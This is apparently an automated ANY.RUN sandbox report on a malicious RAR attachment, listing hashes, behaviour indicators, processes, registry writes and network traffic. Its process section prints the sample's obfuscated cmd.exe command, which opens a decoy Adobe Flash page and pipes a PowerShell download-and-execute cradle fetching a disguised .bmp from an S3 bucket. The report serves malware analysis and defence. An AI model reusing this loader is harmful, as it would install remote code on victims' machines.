File name:

anexo-seguro_SENHA1425.rar

Full analysis: https://app.any.run/tasks/7b39decb-e3b2-4a92-948a-4efdcdcfa30c
Verdict: Malicious activity
Analysis date: November 15, 2018, 00:20:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

CA4A91BF6502EED8B8446ADBE461A7E7

SHA1:

447D44453CF07673215DF79342F097440FB08F95

SHA256:

232814A638311F0C81C8E36E440FA704F9311F95E52D879C8C2FAC80D7D05364

SSDEEP:

24:ZOrZC49opHN6IjJ+lNfWXhAt04qcsWogdfcrbgRA+7p2ketmQ1OkzRC6jf:ZSZzUmNfWXitOcs/gRaYp2kOBxs2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3276)
    • Writes to a start menu file

      • powershell.exe (PID: 2944)
  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 3276)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3276)
    • Starts Internet Explorer

      • cmd.exe (PID: 3932)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2944)
    • Creates files in the user directory

      • powershell.exe (PID: 2944)
  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3536)
    • Changes internet zones settings

      • iexplore.exe (PID: 3016)
    • Application launched itself

      • iexplore.exe (PID: 3016)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3536)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3016)
    • Creates files in the user directory

      • iexplore.exe (PID: 3536)
      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3152)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
9
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs iexplore.exe iexplore.exe cmd.exe no specs powershell.exe flashutil32_26_0_0_131_activex.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2872C:\Windows\system32\cmd.exe /S /D /c" echo %rQOzmYiE1kz%("%rQOzmYiE1kz%(NEw-o%Qoc0CUvHHZ%ct NeT.wEbcLient).down%D0EWPx1otyjl%S%ec0Vz1pke9E6a%NG('%0qcmtX3XeNhmLpbDlT0m:~2,4%s://s3-eu-west-1.amazonaws%LyNYHfKqFb1LpEB4ix6rjk%/juremasobra2/jureklarj934t9oi4%Mb0cdUF7SF8g0RW%')"); "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2944WindowspOwErshEll\v1.0\pOwErshEll -nop -win 1 -C:\Windows\System32\WindowspOwErshEll\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3016"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1073807364
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3152C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -EmbeddingC:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Installer/Uninstaller 26.0 r0
Exit code:
0
Version:
26,0,0,131
Modules
Images
c:\windows\system32\macromed\flash\flashutil32_26_0_0_131_activex.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
3276"C:\Windows\system32\cmd.exe" /V /C set 0qcmtX3XeNhmLpbDlT0m=2whttpr0&&set LyNYHfKqFb1LpEB4ix6rjk=.com&& echo | start %0qcmtX3XeNhmLpbDlT0m:~2,4%s://get.adobe%LyNYHfKqFb1LpEB4ix6rjk%/br/flashplayer/ &&set gzHp8NehPoCl0dn0pOm= -win 1 &&set U1EPkUaR=ndows&&set rQOzmYiE1kz=iEx&&set ec0Vz1pke9E6a=tRi&&set Qoc0CUvHHZ=bJe&&set D0EWPx1otyjl=LOad&&set zCp1cQ7KW=nop&&set p28gc=NEw&&set gtQK=wEbc&&set LQSIWxL7XbRHBEh6I=nt).dow&&set eir0VQmD4ANEsQ2Ln0viV=t NeT.&&set SX=Ers&&set hBp9GtYhKSsApq=hEll&&set Mb0cdUF7SF8g0RW=.bmp&&set 3xNfv8lD3huuFGbU=\v1.0\&&set 3Ia=pOw&&set 8nc8qxM=%0qcmtX3XeNhmLpbDlT0m:~2,4%s://s3-eu-west-1.amazonaws%LyNYHfKqFb1LpEB4ix6rjk%/juremasobra2/jureklarj934t9oi4%Mb0cdUF7SF8g0RW%&&@echo off && C: && cd\ && cd C:\Windows\System32 &&echo %rQOzmYiE1kz%("%rQOzmYiE1kz%(!p28gc!-o%Qoc0CUvHHZ%c!eir0VQmD4ANEsQ2Ln0viV!!gtQK!Lie!LQSIWxL7XbRHBEh6I!n%D0EWPx1otyjl%S%ec0Vz1pke9E6a%NG('%0qcmtX3XeNhmLpbDlT0m:~2,4%s://s3-eu-west-1.amazonaws%LyNYHfKqFb1LpEB4ix6rjk%/juremasobra2/jureklarj934t9oi4%Mb0cdUF7SF8g0RW%')"); | Wi!U1EPkUaR!!3Ia!!SX!!hBp9GtYhKSsApq!!3xNfv8lD3huuFGbU!!3Ia!!SX!!hBp9GtYhKSsApq! -!zCp1cQ7KW!!gzHp8NehPoCl0dn0pOm! -C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3536"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3016 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3804"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\anexo-seguro_SENHA1425.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3868C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3932C:\Windows\system32\cmd.exe /S /D /c" start %0qcmtX3XeNhmLpbDlT0m:~2,4%s://get.adobe%LyNYHfKqFb1LpEB4ix6rjk%/br/flashplayer/ "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
1 541
Read events
1 385
Write events
156
Delete events
0

Modification events

(PID) Process:(3804) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3804) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3804) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3804) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\anexo-seguro_SENHA1425.rar
(PID) Process:(3804) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3804) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3804) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3804) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3804) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath
Operation:writeName:0
Value:
C:\Users\admin\Desktop
(PID) Process:(3804) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
Executable files
2
Suspicious files
10
Text files
47
Unknown types
9

Dropped files

PID
Process
Filename
Type
2944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y9B71UEAZ3MKW6O68TO4.temp
MD5:
SHA256:
3016iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
3016iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3536iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\flashplayer[1].txt
MD5:
SHA256:
3536iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\core[1].csstext
MD5:
SHA256:
3536iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\PP6KS563\jquery-ui[1].csstext
MD5:
SHA256:
3536iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@adobe[1].txttext
MD5:
SHA256:
3536iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BWPPCY0O\ie_fix[1].csstext
MD5:
SHA256:
3536iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\flashplayer[1].htmhtml
MD5:
SHA256:
2944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1745e2.TMPbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
25
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3536
iexplore.exe
GET
200
2.16.186.89:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
unknown
compressed
54.4 Kb
whitelisted
3536
iexplore.exe
GET
200
52.85.182.123:80
http://x.ss2.us/x.cer
US
der
1.27 Kb
whitelisted
3016
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3016
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3536
iexplore.exe
192.147.130.63:443
get.adobe.com
Adobe Systems Inc.
US
whitelisted
2944
powershell.exe
52.218.84.218:443
s3-eu-west-1.amazonaws.com
Amazon.com, Inc.
IE
unknown
3536
iexplore.exe
104.111.237.111:443
wwwimages2.adobe.com
Akamai International B.V.
NL
whitelisted
3536
iexplore.exe
52.54.20.54:443
fonts.adobe.com
Amazon.com, Inc.
US
unknown
3536
iexplore.exe
104.109.64.186:443
static-fonts.adobe.com
Akamai International B.V.
NL
whitelisted
3536
iexplore.exe
54.76.214.247:443
adobe.demdex.net
Amazon.com, Inc.
IE
unknown
3016
iexplore.exe
192.147.130.63:443
get.adobe.com
Adobe Systems Inc.
US
whitelisted
3536
iexplore.exe
66.117.28.86:443
cm.everesttech.net
Adobe Systems Inc.
US
whitelisted
3536
iexplore.exe
52.31.106.135:443
ml314.com
Amazon.com, Inc.
IE
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
get.adobe.com
  • 192.147.130.63
whitelisted
s3-eu-west-1.amazonaws.com
  • 52.218.84.218
shared
wwwimages2.adobe.com
  • 104.111.237.111
whitelisted
assets.adobedtm.com
  • 2.18.232.23
whitelisted
fonts.adobe.com
  • 52.54.20.54
  • 52.21.184.117
whitelisted
static-fonts.adobe.com
  • 104.109.64.186
whitelisted
dpm.demdex.net
  • 52.51.131.19
  • 34.247.143.160
  • 52.16.89.247
  • 34.251.231.74
  • 54.246.133.167
  • 34.249.86.253
  • 34.243.36.162
  • 46.51.193.164
whitelisted
sstats.adobe.com
  • 172.82.236.67
whitelisted
adobe.demdex.net
  • 54.76.214.247
  • 52.49.41.66
  • 52.17.226.250
  • 54.194.25.183
  • 54.154.86.186
  • 54.154.98.49
  • 54.76.193.55
  • 52.49.47.75
whitelisted

Threats

No threats detected
No debug info